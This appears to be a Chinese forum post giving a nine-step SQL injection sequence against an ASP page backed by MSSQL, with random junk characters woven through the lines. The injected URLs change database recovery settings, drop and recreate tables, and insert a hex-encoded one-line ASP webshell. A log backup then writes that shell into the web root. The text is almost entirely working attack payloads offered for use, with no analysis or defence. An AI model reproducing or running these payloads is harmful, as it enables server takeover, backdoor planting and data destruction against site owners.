第一步
8 F" Q& \3 N7 S* Z" G1 a6 xhttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--1 J" |# @1 i, `& ]. C7 b) [
1 [4 B4 P4 R# @) h
第二步:: h% `. r0 w. ~
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--5 W' t( D9 R4 ^5 }" h
! r, ^% u8 T% K0 x) A
第三步 ~& g2 {" p5 c0 l8 `1 `6 i( V T
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--, d }% E4 n$ n; z' Q2 y* W6 m/ h0 P
/ q# `! N7 O' b% h/ q- D5 t+ S第四步$ v; N0 F7 ~+ t" g2 T
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
; T" P* v0 u# z: e
' I) T8 G. L; O4 I第五步
$ z: d, m$ x- X2 B1 r0 G1 P) Phttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
6 \8 m. @' z: v. @3 X
! Q- | P' D# b# e: ^8 q第六步7 [9 D6 g: k4 s% g- I
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--; i6 k B6 E+ l) P Y
7 W9 q* {& {/ b: p0 R
第七步, y/ F4 z) l5 k# C. n* Z
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
2 @9 e; _) G( A; h2 N% L
! k9 J& x4 H5 \5 E- c第八步
6 m6 P6 {2 ~8 U" D; Bhttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--- D4 m9 F+ k3 j) L: g; ?
^1 k( k' ~3 q: v3 T j第九步
5 f# l( V" N! U8 ], f, Phttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
& B2 w% C9 |5 W) g( R$ Y3 j |